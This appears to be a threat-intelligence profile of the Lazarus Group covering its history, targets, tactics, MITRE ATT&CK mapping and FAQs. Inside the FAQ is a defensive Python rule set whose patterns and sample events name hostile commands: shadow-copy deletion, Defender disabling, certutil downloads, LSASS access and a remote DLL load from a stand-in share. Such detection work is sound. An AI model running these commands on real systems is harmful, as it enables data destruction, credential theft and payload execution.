Lazarus Group

The Lazarus Group is a North Korean state-sponsored Advanced Persistent Threat (APT) group.

The Origin of the Lazarus Group

The Lazarus Group has been active since around 2009, with its first major operation known as 'Operation Troy'. The group is responsible for several high-profile cyberattacks, including the 2014 Sony Pictures hack, the 2016 Bangladesh Bank heist, and the 2017 WannaCry ransomware attack.

Unlike many state-sponsored groups, Lazarus is highly financially motivated, conducting bank heists and cryptocurrency thefts to support North Korea's economy.

According to MITRE, North Korean threat group definitions often overlap significantly. Some security researchers categorize all North Korean state-sponsored cyber activity under the Lazarus Group name, rather than distinguishing between specific clusters or subgroups like Andariel, APT37, APT38, and Kimsuky.

The group used the name Guardians of Peace for the Sony hack but is also known by other names such as Hidden Cobra (by the US Department of Homeland Security and the FBI), ZINC, NICKEL ACADEMY, Diamond Sleet (by Microsoft) and Labyrinth Chollima (by CrowdStrike).

Source of the Timeline: Trend Micro

Lazarus' Targets

Countries targeted by Lazarus

The group's operations have been traced globally, with confirmed activity in the United States, South Korea, India, Bangladesh, and the broader Asia-Pacific region. They have also targeted entities in Europe and the Middle East. Lazarus is known for targeting countries involved in economic sanctions or diplomatic disputes with North Korea.

Industries targeted by the Lazarus Group

Lazarus Group has shown a diverse targeting profile, including government agencies, financial institutions, defense contractors, cryptocurrency exchanges, and media companies. Their motivations vary from political espionage to financial theft, with a focus on sectors that can either generate funds for the North Korean regime or yield sensitive information.

Lazarus' Victims

Notable victims include Sony Pictures (2014), Bangladesh Bank (2016), and various cryptocurrency exchanges. Their activity in the financial sector, particularly through the use of destructive malware and heists, has caused millions in damages. The group has also conducted cyber espionage campaigns against South Korean institutions.

Lazarus Group's Attack Method

Initial Access

Lazarus frequently uses spear-phishing campaigns to gain initial access, often employing malicious attachments or links that deliver custom malware.

Privilege Escalation

After gaining access, they deploy tools such as rootkits or custom malware to elevate privileges and move deeper into networks.

Defense Evasion

The group is adept at evading security measures using techniques like disabling security software, leveraging stolen certificates, or exploiting zero-day vulnerabilities.

Credential Access

Lazarus uses keyloggers, credential-dumping tools, and exploits to gather user credentials, often targeting high-privilege accounts.

Discovery

Once inside a system, they perform network reconnaissance to identify critical systems and data repositories using built-in commands and tools like PowerShell.

Lateral Movement

Lazarus moves laterally across networks using valid credentials, Remote Desktop Protocol (RDP), or by exploiting trust relationships between systems.

Collection

Sensitive data is often collected through tools like file-sharing services or malware with custom exfiltration capabilities, targeting financial data, cryptocurrency wallets, and confidential documents.

Execution

The group uses custom backdoors, such as Manuscrypt and Destover, to execute commands remotely and maintain persistence.

Exfiltration

Stolen data is exfiltrated using compromised web servers, FTP servers, or encrypted communication channels to ensure that the information reaches their command and control infrastructure.

Impact

In financial operations, Lazarus often disrupts systems post-theft, using wiper malware to cover their tracks. They have been involved in ransomware campaigns and data destruction, further amplifying the impact on their victims.

MITRE ATT&CK Mapping

TA0001: Initial Access: no techniques listed
TA0002: Execution: no techniques listed
TA0003: Persistence: T1053 Scheduled Task/Job
TA0004: Privilege Escalation: T1053 Scheduled Task/Job
TA0005: Defense Evasion: T1218 System Binary Proxy Execution; T1562 Impair Defenses
TA0006: Credential Access: T1003 OS Credential Dumping
TA0007: Discovery: no techniques listed
TA0008: Lateral Movement: no techniques listed
TA0009: Collection: no techniques listed
TA0011: Command and Control: T1105 Ingress Tool Transfer
TA0010: Exfiltration: no techniques listed
TA0040: Impact: T1490 Inhibit System Recovery

FAQs

What is Lazarus Group known for?

Lazarus Group is known for cyber-espionage and large-scale financial theft, including the 2014 Sony Pictures attack and the 2016 Bangladesh Bank heist.

What motivates the Lazarus Group?

Their activities are driven by North Korean state interests, including political retaliation, espionage, and generating financial resources through illicit activities.

How does Lazarus gain initial access to target systems?

They frequently use spear-phishing campaigns with malicious attachments or links to deliver malware.

What sectors are commonly targeted by Lazarus?

Lazarus targets financial institutions, cryptocurrency exchanges, media companies, and government agencies.

What malware tools are associated with Lazarus Group?

They are associated with tools like Manuscrypt, Destover, and various custom backdoors and wipers.

What makes Lazarus Group difficult to detect?

Lazarus uses advanced defense evasion techniques, such as disabling security software, obfuscating malware, and using encrypted communication channels.

What role does Lazarus play in financial crimes?

The group is involved in stealing money from banks and cryptocurrency platforms, as well as conducting ransomware and destructive attacks to extort victims.

How can organizations detect Lazarus Group activities?

Organizations should monitor for known TTPs, such as abnormal application-layer protocols, suspicious use of valid accounts, and unusual credential access activity.
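One way a SOC can operationalize the MITRE ATT&CK mapping above together with this FAQ's advice to monitor for known TTPs, as an added example that is not part of the original page: a small Python rule set keyed to the technique IDs the mapping lists, run over constructed Windows Security and Sysmon events. The event field names, hostnames and the 10.0.0.5 share path are assumptions of the example, not indicators from the page.

```python
import re

# Sigma-style rules keyed to the technique IDs mapped on this page. Each rule
# inspects one event dict; field names (event_id, image, cmd, target, access,
# host) follow common Windows Security / Sysmon conventions (an assumption).
RULES = [
    ("T1053", lambda e: e["event_id"] == 4698),                      # task created
    ("T1562", lambda e: e["event_id"] == 1 and re.search(
        r"set-mppreference.*-disablerealtimemonitoring|net stop +(windefend|sense)",
        e.get("cmd", ""), re.I)),
    ("T1218", lambda e: e["event_id"] == 1
        and re.search(r"\\(rundll32|regsvr32|mshta)\.exe$", e.get("image", ""), re.I)
        and re.search(r"https?://|\\\\", e.get("cmd", ""))),          # remote payload
    ("T1003", lambda e: e["event_id"] == 10
        and e.get("target", "").lower().endswith("\\lsass.exe")
        and e.get("access", 0) & 0x1010),                           # VM_READ / QUERY
    ("T1105", lambda e: e["event_id"] == 1 and re.search(
        r"certutil.*-urlcache|bitsadmin.*/transfer|invoke-webrequest",
        e.get("cmd", ""), re.I)),
    ("T1490", lambda e: e["event_id"] == 1 and re.search(
        r"vssadmin.*delete shadows|wbadmin.*delete catalog|bcdedit.*recoveryenabled no",
        e.get("cmd", ""), re.I)),
]

def match_events(events):
    """Return (technique_id, host) for every rule each event trips."""
    return [(tid, e["host"]) for e in events for tid, pred in RULES if pred(e)]

def coverage(hits):
    """Distinct techniques per host; several stages chained on one host is the
    kind of intrusion the attack-method section above describes."""
    per_host = {}
    for tid, host in hits:
        per_host.setdefault(host, set()).add(tid)
    return {h: sorted(t) for h, t in per_host.items()}

# Constructed sample telemetry (no real indicators): Security 4698, Sysmon 1 and 10.
SAMPLE_EVENTS = [
    {"host": "ws01", "event_id": 1, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": "cmd /c whoami"},
    {"host": "ws01", "event_id": 1, "image": r"C:\Windows\System32\rundll32.exe",
     "cmd": r"rundll32.exe \\10.0.0.5\share\upd.dll,Start"},
    {"host": "ws01", "event_id": 10, "target": r"C:\Windows\system32\lsass.exe",
     "access": 0x1010},
    {"host": "srv02", "event_id": 4698, "task": r"\Microsoft\Windows\Update\SvcHost"},
    {"host": "srv02", "event_id": 1, "image": r"C:\Windows\System32\vssadmin.exe",
     "cmd": "vssadmin delete shadows /all /quiet"},
]
```

Calling `coverage(match_events(SAMPLE_EVENTS))` groups the hits per host, so a workstation showing both T1218 and T1003 surfaces as a chained intrusion rather than two unrelated alerts.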

What are some defensive measures to counter Lazarus Group?

Implementing multi-factor authentication (MFA), strong network segmentation, timely patching of vulnerabilities, and advanced threat detection tools can mitigate their attacks.

Has Lazarus Group been involved in ransomware attacks?

Yes, they have deployed ransomware in some of their campaigns to maximize financial gain and disrupt victims' operations.